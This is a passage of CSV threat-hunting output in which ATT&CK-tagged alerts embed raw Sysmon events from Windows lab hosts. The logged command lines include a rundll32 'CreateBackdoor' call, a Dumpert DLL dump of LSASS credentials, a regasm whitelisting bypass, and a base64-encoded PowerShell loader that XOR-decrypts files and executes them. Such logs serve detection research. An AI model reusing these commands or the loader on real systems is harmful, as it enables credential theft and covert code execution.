<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:14.781</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
</TimeCreated>
<EventRecordID>243547</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
<Data Name=""ProcessId"">6400</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.255498,2020-03-21T09:00:25.255498+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.250487Z"">
</TimeCreated>
<EventRecordID>243547</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.122</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010DE732000</Data>
<Data Name=""ProcessId"">6400</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003.001] Credential dump Thread Open to Lsass,1556628223.784179,2019-04-30T16:43:43.784179+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>8</EventID>
<Version>2</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T12:43:43.784179Z"">
</TimeCreated>
<EventRecordID>9060</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 12:43:43.784</Data>
<Data Name=""SourceProcessGuid"">365ABB72-4055-5CC8-0000-0010769D0B00</Data>
<Data Name=""SourceProcessId"">1532</Data>
<Data Name=""SourceImage"">\\VBOXSVR\HTools\voice_mail.msg.exe</Data>
<Data Name=""TargetProcessGuid"">365ABB72-3FE0-5CC8-0000-00107E590000</Data>
<Data Name=""TargetProcessId"">492</Data>
<Data Name=""TargetImage"">C:\Windows\System32\lsass.exe</Data>
<Data Name=""NewThreadId"">1744</Data>
<Data Name=""StartAddress"">0x001A0000</Data>
<Data Name=""StartModule""></Data>
<Data Name=""StartFunction""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436014.483714,2019-07-30T01:33:34.483714+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:34.411034Z"">
</TimeCreated>
<EventRecordID>4923</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:34.234</Data>
<Data Name=""ProcessGuid"">747F3D96-662E-5D3F-0000-0010C2048900</Data>
<Data Name=""ProcessId"">1976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1584794155.89745,2020-03-21T16:35:55.897450+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net start CDPSvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T12:35:55.876452Z"">
</TimeCreated>
<EventRecordID>244336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2844"" ThreadID=""3648"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 12:35:55.872</Data>
<Data Name=""ProcessGuid"">747F3D96-0A2B-5E76-0000-0010C02A3D00</Data>
<Data Name=""ProcessId"">7072</Data>
<Data Name=""Image"">C:\Windows\System32\net.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Net Command</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">net.exe</Data>
<Data Name=""CommandLine"">net start CDPSvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-06A4-5E76-0000-002043DE0200</Data>
<Data Name=""LogonId"">0x2de43</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
<Data Name=""ParentProcessGuid"">747F3D96-077C-5E76-0000-0010A5BA2300</Data>
<Data Name=""ParentProcessId"">5068</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.000311,2019-05-27T05:29:17.000311+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\InetSRV\appcmd.exe&quot; list vdir /text:physicalpath ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.000311Z"">
</TimeCreated>
<EventRecordID>5877</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:16.960</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6C-5CEB-0000-00107257FF00</Data>
<Data Name=""ProcessId"">3484</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\InetSRV\appcmd.exe&quot; list vdir /text:physicalpath</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
</TimeCreated>
<EventRecordID>238378</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1560"" ThreadID=""2316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
<Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
<Data Name=""LogonId"">0xf6a26</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
<Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
<Data Name=""ParentProcessId"">3964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
</TimeCreated>
<EventRecordID>238378</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1560"" ThreadID=""2316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
<Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
<Data Name=""LogonId"">0xf6a26</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C</Data>
<Data Name=""ParentProcessGuid"">ECAD0485-8897-5D0C-0000-0010A2FA1C00</Data>
<Data Name=""ParentProcessId"">3964</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1561102550.259077,2019-06-21T11:35:50.259077+04:00,,Threat,High,"Found User (insecurebank\Administrator) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-06-21T07:35:50.128026Z"">
</TimeCreated>
<EventRecordID>238378</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1560"" ThreadID=""2316"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>alice.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-06-21 07:35:50.093</Data>
<Data Name=""ProcessGuid"">ECAD0485-88D6-5D0C-0000-001007AA1D00</Data>
<Data Name=""ProcessId"">1568</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.3.9600.17415 (winblue_r4.141028-1500)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\Desktop\x64\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">ECAD0485-87E3-5D0C-0000-0020266A0F00</Data>
<Data Name=""LogonId"">0xf6a26</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
